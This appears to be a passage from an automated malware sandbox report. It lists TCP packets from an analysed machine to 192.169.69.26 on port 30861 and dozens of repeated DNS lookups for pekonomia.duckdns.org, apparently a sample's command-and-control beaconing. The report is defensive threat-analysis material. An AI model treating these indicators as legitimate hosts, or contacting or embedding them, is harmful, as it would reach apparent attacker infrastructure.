              Jun 6, 2023 17:24:25.945034027 CEST3086149734192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:29.137053013 CEST4973530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:29.438515902 CEST3086149735192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:29.438702106 CEST4973530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:29.446450949 CEST4973530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:29.774696112 CEST3086149735192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:30.803805113 CEST4973630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:31.112025976 CEST3086149736192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:31.116293907 CEST4973630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:31.124258041 CEST4973630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:31.445497990 CEST3086149736192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:32.474558115 CEST4973730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:32.735125065 CEST3086149737192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:32.735235929 CEST4973730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:32.741012096 CEST4973730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:33.050534010 CEST3086149737192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:34.305586100 CEST4973830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:34.539402008 CEST3086149738192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:34.539501905 CEST4973830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:34.545975924 CEST4973830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:35.105670929 CEST4973830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:35.181283951 CEST3086149738192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:35.364156961 CEST3086149738192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:36.238653898 CEST4973930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:36.815496922 CEST3086149739192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:36.815834999 CEST4973930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:36.823611021 CEST4973930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:37.030478954 CEST3086149739192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:38.071619034 CEST4974030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:38.333754063 CEST3086149740192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:38.333853960 CEST4974030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:38.343024015 CEST4974030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:38.668785095 CEST3086149740192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:39.722443104 CEST4974130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:40.003706932 CEST3086149741192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:40.008017063 CEST4974130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:40.014975071 CEST4974130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:40.331516027 CEST3086149741192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:41.400082111 CEST4974230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:41.682156086 CEST3086149742192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:41.682271004 CEST4974230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:41.691848040 CEST4974230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:41.990216970 CEST3086149742192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:43.033509016 CEST4974330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:43.271533012 CEST3086149743192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:43.271856070 CEST4974330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:43.280740976 CEST4974330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:43.510440111 CEST3086149743192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:44.674881935 CEST4974430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:45.013586044 CEST3086149744192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:45.013746977 CEST4974430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:45.019593000 CEST4974430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:45.484585047 CEST3086149744192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:46.525798082 CEST4974530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:46.758080006 CEST3086149745192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:46.758214951 CEST4974530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:46.764437914 CEST4974530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:47.256464005 CEST3086149745192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:48.295209885 CEST4974630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:48.916579008 CEST3086149746192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:48.916687012 CEST4974630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:48.923408031 CEST4974630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:49.233443975 CEST3086149746192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:50.275986910 CEST4974730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:50.545213938 CEST3086149747192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:50.549853086 CEST4974730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:50.557832956 CEST4974730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:51.154023886 CEST4974730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:51.208031893 CEST3086149747192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:51.387751102 CEST3086149747192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:52.249450922 CEST4974830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:52.920059919 CEST3086149748192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:52.920166969 CEST4974830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:52.926160097 CEST4974830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:53.235061884 CEST3086149748192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:54.281557083 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.655350924 CEST3086149749192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:54.655930996 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.662023067 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.952296019 CEST3086149749192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:55.994157076 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.273822069 CEST3086149750192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:56.274104118 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.284198046 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.738667965 CEST3086149750192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:57.784828901 CEST4975130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:58.061820030 CEST3086149751192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:58.062114000 CEST4975130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:58.068386078 CEST4975130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:58.573993921 CEST3086149751192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:59.603640079 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.276000023 CEST3086149752192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:00.276130915 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.282345057 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.591722012 CEST3086149752192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:01.623442888 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:01.911439896 CEST3086149753192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:01.911748886 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:01.921581984 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:02.269655943 CEST3086149753192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:03.315639019 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.550843954 CEST3086149754192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:03.551131964 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.565720081 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.885087967 CEST3086149754192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:04.908169031 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.232669115 CEST3086149755192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:05.233071089 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.239201069 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.562417030 CEST3086149755192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:06.609831095 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:06.801959991 CEST3086149756192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:06.802129984 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:06.817325115 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:07.240406036 CEST3086149756192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:08.268162966 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:08.738677025 CEST3086149757192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:08.742011070 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:08.750278950 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:09.242665052 CEST3086149757192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:10.275815010 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:10.765023947 CEST3086149758192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:10.765155077 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:10.770080090 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:11.072143078 CEST3086149758192.169.69.26192.168.2.4

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jun 6, 2023 17:23:07.842909098 CEST5968353192.168.2.48.8.8.8
              Jun 6, 2023 17:23:08.868144035 CEST5968353192.168.2.48.8.8.8
              Jun 6, 2023 17:23:09.872961998 CEST5968353192.168.2.48.8.8.8
              Jun 6, 2023 17:23:10.011384964 CEST53596838.8.8.8192.168.2.4
              Jun 6, 2023 17:23:11.757905006 CEST6416753192.168.2.48.8.8.8
              Jun 6, 2023 17:23:11.872504950 CEST53641678.8.8.8192.168.2.4
              Jun 6, 2023 17:23:13.824974060 CEST5856553192.168.2.48.8.8.8
              Jun 6, 2023 17:23:13.844806910 CEST53585658.8.8.8192.168.2.4
              Jun 6, 2023 17:23:15.479593039 CEST5223953192.168.2.48.8.8.8
              Jun 6, 2023 17:23:15.609191895 CEST53522398.8.8.8192.168.2.4
              Jun 6, 2023 17:23:19.760226965 CEST5680753192.168.2.48.8.8.8
              Jun 6, 2023 17:23:19.779814005 CEST53568078.8.8.8192.168.2.4
              Jun 6, 2023 17:23:21.727471113 CEST6100753192.168.2.48.8.8.8
              Jun 6, 2023 17:23:21.747344971 CEST53610078.8.8.8192.168.2.4
              Jun 6, 2023 17:23:23.843090057 CEST6068653192.168.2.48.8.8.8
              Jun 6, 2023 17:23:23.862986088 CEST53606868.8.8.8192.168.2.4
              Jun 6, 2023 17:23:25.571588039 CEST6112453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:25.599648952 CEST53611248.8.8.8192.168.2.4
              Jun 6, 2023 17:23:27.315334082 CEST5944453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:28.370309114 CEST5944453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:29.366127968 CEST5944453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:29.394942999 CEST53594448.8.8.8192.168.2.4
              Jun 6, 2023 17:23:31.104743958 CEST5557053192.168.2.48.8.8.8
              Jun 6, 2023 17:23:31.218715906 CEST53555708.8.8.8192.168.2.4
              Jun 6, 2023 17:23:32.776896000 CEST6490653192.168.2.48.8.8.8
              Jun 6, 2023 17:23:32.805476904 CEST53649068.8.8.8192.168.2.4
              Jun 6, 2023 17:23:34.520683050 CEST5944653192.168.2.48.8.8.8
              Jun 6, 2023 17:23:34.549218893 CEST53594468.8.8.8192.168.2.4
              Jun 6, 2023 17:23:36.103789091 CEST5086153192.168.2.48.8.8.8
              Jun 6, 2023 17:23:36.123658895 CEST53508618.8.8.8192.168.2.4
              Jun 6, 2023 17:23:37.650890112 CEST6108853192.168.2.48.8.8.8
              Jun 6, 2023 17:23:37.670564890 CEST53610888.8.8.8192.168.2.4
              Jun 6, 2023 17:23:39.491831064 CEST5872953192.168.2.48.8.8.8
              Jun 6, 2023 17:23:39.644150972 CEST53587298.8.8.8192.168.2.4
              Jun 6, 2023 17:23:41.729126930 CEST6470053192.168.2.48.8.8.8
              Jun 6, 2023 17:23:41.752347946 CEST53647008.8.8.8192.168.2.4
              Jun 6, 2023 17:23:43.371170998 CEST5602253192.168.2.48.8.8.8
              Jun 6, 2023 17:23:43.385559082 CEST53560228.8.8.8192.168.2.4
              Jun 6, 2023 17:23:45.041933060 CEST5485153192.168.2.48.8.8.8
              Jun 6, 2023 17:23:45.069904089 CEST53548518.8.8.8192.168.2.4
              Jun 6, 2023 17:23:46.535536051 CEST5730053192.168.2.48.8.8.8
              Jun 6, 2023 17:23:46.563900948 CEST53573008.8.8.8192.168.2.4
              Jun 6, 2023 17:23:48.199925900 CEST5452153192.168.2.48.8.8.8
              Jun 6, 2023 17:23:48.329842091 CEST53545218.8.8.8192.168.2.4
              Jun 6, 2023 17:23:49.855040073 CEST5891453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:49.874944925 CEST53589148.8.8.8192.168.2.4
              Jun 6, 2023 17:23:53.465065956 CEST5141953192.168.2.48.8.8.8
              Jun 6, 2023 17:23:53.485065937 CEST53514198.8.8.8192.168.2.4
              Jun 6, 2023 17:23:55.499727011 CEST5105453192.168.2.48.8.8.8
              Jun 6, 2023 17:23:55.528429985 CEST53510548.8.8.8192.168.2.4
              Jun 6, 2023 17:23:57.402059078 CEST5567353192.168.2.48.8.8.8
              Jun 6, 2023 17:23:57.421524048 CEST53556738.8.8.8192.168.2.4
              Jun 6, 2023 17:23:59.402724028 CEST4973553192.168.2.48.8.8.8
              Jun 6, 2023 17:23:59.431236982 CEST53497358.8.8.8192.168.2.4
              Jun 6, 2023 17:24:01.121879101 CEST5243753192.168.2.48.8.8.8
              Jun 6, 2023 17:24:01.141323090 CEST53524378.8.8.8192.168.2.4
              Jun 6, 2023 17:24:02.886992931 CEST5282553192.168.2.48.8.8.8
              Jun 6, 2023 17:24:02.915380001 CEST53528258.8.8.8192.168.2.4
              Jun 6, 2023 17:24:04.623007059 CEST5853053192.168.2.48.8.8.8
              Jun 6, 2023 17:24:04.649470091 CEST53585308.8.8.8192.168.2.4
              Jun 6, 2023 17:24:08.423386097 CEST6495953192.168.2.48.8.8.8
              Jun 6, 2023 17:24:08.438074112 CEST53649598.8.8.8192.168.2.4
              Jun 6, 2023 17:24:10.349967003 CEST6309353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:10.369967937 CEST53630938.8.8.8192.168.2.4
              Jun 6, 2023 17:24:12.185261965 CEST5043353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:12.213613033 CEST53504338.8.8.8192.168.2.4
              Jun 6, 2023 17:24:14.093641043 CEST5349853192.168.2.48.8.8.8
              Jun 6, 2023 17:24:14.108341932 CEST53534988.8.8.8192.168.2.4
              Jun 6, 2023 17:24:16.310941935 CEST6146053192.168.2.48.8.8.8
              Jun 6, 2023 17:24:16.442303896 CEST53614608.8.8.8192.168.2.4
              Jun 6, 2023 17:24:18.202089071 CEST6300153192.168.2.48.8.8.8
              Jun 6, 2023 17:24:18.340361118 CEST53630018.8.8.8192.168.2.4
              Jun 6, 2023 17:24:20.404315948 CEST6513353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:20.526863098 CEST53651338.8.8.8192.168.2.4
              Jun 6, 2023 17:24:22.068470955 CEST6099853192.168.2.48.8.8.8
              Jun 6, 2023 17:24:22.098330021 CEST53609988.8.8.8192.168.2.4
              Jun 6, 2023 17:24:23.530201912 CEST6173353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:23.549674034 CEST53617338.8.8.8192.168.2.4
              Jun 6, 2023 17:24:25.286185980 CEST5337053192.168.2.48.8.8.8
              Jun 6, 2023 17:24:25.314686060 CEST53533708.8.8.8192.168.2.4
              Jun 6, 2023 17:24:26.952038050 CEST6374653192.168.2.48.8.8.8
              Jun 6, 2023 17:24:27.984253883 CEST6374653192.168.2.48.8.8.8
              Jun 6, 2023 17:24:28.996661901 CEST6374653192.168.2.48.8.8.8
              Jun 6, 2023 17:24:29.134788036 CEST53637468.8.8.8192.168.2.4
              Jun 6, 2023 17:24:30.779999971 CEST5062253192.168.2.48.8.8.8
              Jun 6, 2023 17:24:30.799817085 CEST53506228.8.8.8192.168.2.4
              Jun 6, 2023 17:24:32.452723980 CEST6477353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:32.472512960 CEST53647738.8.8.8192.168.2.4
              Jun 6, 2023 17:24:34.280824900 CEST5981853192.168.2.48.8.8.8
              Jun 6, 2023 17:24:34.303818941 CEST53598188.8.8.8192.168.2.4
              Jun 6, 2023 17:24:36.203314066 CEST4968453192.168.2.48.8.8.8
              Jun 6, 2023 17:24:36.231791019 CEST53496848.8.8.8192.168.2.4
              Jun 6, 2023 17:24:38.046365023 CEST6322953192.168.2.48.8.8.8
              Jun 6, 2023 17:24:38.069847107 CEST53632298.8.8.8192.168.2.4
              Jun 6, 2023 17:24:39.687596083 CEST5857653192.168.2.48.8.8.8
              Jun 6, 2023 17:24:39.715939045 CEST53585768.8.8.8192.168.2.4
              Jun 6, 2023 17:24:41.369954109 CEST5404453192.168.2.48.8.8.8
              Jun 6, 2023 17:24:41.397990942 CEST53540448.8.8.8192.168.2.4
              Jun 6, 2023 17:24:43.000757933 CEST5225953192.168.2.48.8.8.8
              Jun 6, 2023 17:24:43.029664993 CEST53522598.8.8.8192.168.2.4
              Jun 6, 2023 17:24:44.534632921 CEST5388753192.168.2.48.8.8.8
              Jun 6, 2023 17:24:44.672501087 CEST53538878.8.8.8192.168.2.4
              Jun 6, 2023 17:24:46.503317118 CEST5621853192.168.2.48.8.8.8
              Jun 6, 2023 17:24:46.522917032 CEST53562188.8.8.8192.168.2.4
              Jun 6, 2023 17:24:48.273422956 CEST5009453192.168.2.48.8.8.8
              Jun 6, 2023 17:24:48.292912006 CEST53500948.8.8.8192.168.2.4
              Jun 6, 2023 17:24:50.250770092 CEST5176653192.168.2.48.8.8.8
              Jun 6, 2023 17:24:50.273751974 CEST53517668.8.8.8192.168.2.4
              Jun 6, 2023 17:24:52.222918987 CEST6152253192.168.2.48.8.8.8
              Jun 6, 2023 17:24:52.245238066 CEST53615228.8.8.8192.168.2.4
              Jun 6, 2023 17:24:54.251509905 CEST5734953192.168.2.48.8.8.8
              Jun 6, 2023 17:24:54.279695988 CEST53573498.8.8.8192.168.2.4
              Jun 6, 2023 17:24:55.971133947 CEST5396353192.168.2.48.8.8.8
              Jun 6, 2023 17:24:55.990896940 CEST53539638.8.8.8192.168.2.4
              Jun 6, 2023 17:24:57.762820959 CEST5362253192.168.2.48.8.8.8
              Jun 6, 2023 17:24:57.783139944 CEST53536228.8.8.8192.168.2.4
              Jun 6, 2023 17:24:59.581954956 CEST4960053192.168.2.48.8.8.8
              Jun 6, 2023 17:24:59.601772070 CEST53496008.8.8.8192.168.2.4
              Jun 6, 2023 17:25:01.598633051 CEST5835553192.168.2.48.8.8.8
              Jun 6, 2023 17:25:01.621582031 CEST53583558.8.8.8192.168.2.4
              Jun 6, 2023 17:25:03.282915115 CEST5760153192.168.2.48.8.8.8
              Jun 6, 2023 17:25:03.311701059 CEST53576018.8.8.8192.168.2.4
              Jun 6, 2023 17:25:04.892241955 CEST6415953192.168.2.48.8.8.8
              Jun 6, 2023 17:25:04.906692028 CEST53641598.8.8.8192.168.2.4
              Jun 6, 2023 17:25:06.580219984 CEST5992653192.168.2.48.8.8.8
              Jun 6, 2023 17:25:06.607954979 CEST53599268.8.8.8192.168.2.4
              Jun 6, 2023 17:25:08.251962900 CEST6170953192.168.2.48.8.8.8
              Jun 6, 2023 17:25:08.266287088 CEST53617098.8.8.8192.168.2.4
              Jun 6, 2023 17:25:10.254165888 CEST5918253192.168.2.48.8.8.8
              Jun 6, 2023 17:25:10.273897886 CEST53591828.8.8.8192.168.2.4

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jun 6, 2023 17:23:07.842909098 CEST192.168.2.48.8.8.80xc728Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:08.868144035 CEST192.168.2.48.8.8.80xc728Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:09.872961998 CEST192.168.2.48.8.8.80xc728Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:11.757905006 CEST192.168.2.48.8.8.80xa0ddStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:13.824974060 CEST192.168.2.48.8.8.80x351cStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:15.479593039 CEST192.168.2.48.8.8.80x3285Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:19.760226965 CEST192.168.2.48.8.8.80x8664Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:21.727471113 CEST192.168.2.48.8.8.80xb42cStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:23.843090057 CEST192.168.2.48.8.8.80x9c55Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:25.571588039 CEST192.168.2.48.8.8.80xee2aStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:27.315334082 CEST192.168.2.48.8.8.80x6115Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:28.370309114 CEST192.168.2.48.8.8.80x6115Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:29.366127968 CEST192.168.2.48.8.8.80x6115Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:31.104743958 CEST192.168.2.48.8.8.80x7b8aStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:32.776896000 CEST192.168.2.48.8.8.80x26d9Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:34.520683050 CEST192.168.2.48.8.8.80xb5bbStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:36.103789091 CEST192.168.2.48.8.8.80x3babStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:37.650890112 CEST192.168.2.48.8.8.80x7d9bStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:39.491831064 CEST192.168.2.48.8.8.80x636fStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:41.729126930 CEST192.168.2.48.8.8.80x4052Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:43.371170998 CEST192.168.2.48.8.8.80x7272Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:45.041933060 CEST192.168.2.48.8.8.80x2741Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:46.535536051 CEST192.168.2.48.8.8.80xb4a1Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:48.199925900 CEST192.168.2.48.8.8.80xad87Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:49.855040073 CEST192.168.2.48.8.8.80x70fcStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:53.465065956 CEST192.168.2.48.8.8.80xc5a1Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:55.499727011 CEST192.168.2.48.8.8.80xe4f4Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:57.402059078 CEST192.168.2.48.8.8.80xcb52Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:59.402724028 CEST192.168.2.48.8.8.80x8c91Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:01.121879101 CEST192.168.2.48.8.8.80x1d7bStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:02.886992931 CEST192.168.2.48.8.8.80xcf14Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:04.623007059 CEST192.168.2.48.8.8.80x1f5eStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:08.423386097 CEST192.168.2.48.8.8.80x361cStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:10.349967003 CEST192.168.2.48.8.8.80x5ef9Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:12.185261965 CEST192.168.2.48.8.8.80xc983Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:14.093641043 CEST192.168.2.48.8.8.80x950dStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:16.310941935 CEST192.168.2.48.8.8.80x52b5Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:18.202089071 CEST192.168.2.48.8.8.80xed56Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:20.404315948 CEST192.168.2.48.8.8.80x204eStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:22.068470955 CEST192.168.2.48.8.8.80x2055Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:23.530201912 CEST192.168.2.48.8.8.80x7c82Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:25.286185980 CEST192.168.2.48.8.8.80x16bfStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:26.952038050 CEST192.168.2.48.8.8.80xcae8Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:27.984253883 CEST192.168.2.48.8.8.80xcae8Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:28.996661901 CEST192.168.2.48.8.8.80xcae8Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:30.779999971 CEST192.168.2.48.8.8.80x414fStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:32.452723980 CEST192.168.2.48.8.8.80x1cc5Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:34.280824900 CEST192.168.2.48.8.8.80x1385Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:36.203314066 CEST192.168.2.48.8.8.80x5c3cStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:38.046365023 CEST192.168.2.48.8.8.80x625aStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:39.687596083 CEST192.168.2.48.8.8.80x6d9bStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:41.369954109 CEST192.168.2.48.8.8.80x947bStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:43.000757933 CEST192.168.2.48.8.8.80x7d50Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:44.534632921 CEST192.168.2.48.8.8.80xdd7Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
